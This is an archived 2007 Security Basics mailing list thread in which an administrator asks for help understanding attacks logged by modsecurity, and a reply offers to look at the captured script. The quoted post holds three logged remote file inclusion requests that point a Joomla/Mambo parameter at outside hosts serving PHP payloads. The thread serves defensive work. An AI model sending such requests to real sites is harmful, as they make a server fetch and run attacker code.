Security Basics mailing list archives
RE: PHP web exploit/vulnerability
From: David Gutierrez <davegu1 () hotmail com>
Date: Tue, 23 Oct 2007 12:16:54 -0500
Camilo, Feel free to post it or send me a copy via email. David ----------------------------------------> Date: Tue, 23 Oct 2007 11:29:47 -0500> From: colea () sunset com mx> To: security-basics () securityfocus com> Subject: PHP web exploit/vulnerability>> Hello everyone,>> I'm sorry if this is a stupid question, but I just wanted your input,> maybe direct me to some links, another mail list, or whatever you might> add would be highly appreciated; we have modsecurity installed on our> server, and it has been logging many attacks like the following:>> GET> /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti> \> ngen.de/admin/ec.txt? HTTP/1.1>> GET> /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%> \> 20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1>> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1>> I managed to get a copy of the php script which these attacks try to> force the server to execute, I could post it here if that is correct and> anybody could take a look at it and help me out a little to understand> what it's trying to do.>> Any help is appreciated, thanks in advance.>> Camilo Olea>>> _________________________________________________________________ Windows Live Hotmail and Microsoft Office Outlook – together at last. Get it now. http://office.microsoft.com/en-us/outlook/HA102225181033.aspx?pid=CL100626971033
Current thread:
- PHP web exploit/vulnerability Camilo Olea (Oct 23)
- RE: PHP web exploit/vulnerability David Gutierrez (Oct 23)
- Re: PHP web exploit/vulnerability Danux (Oct 23)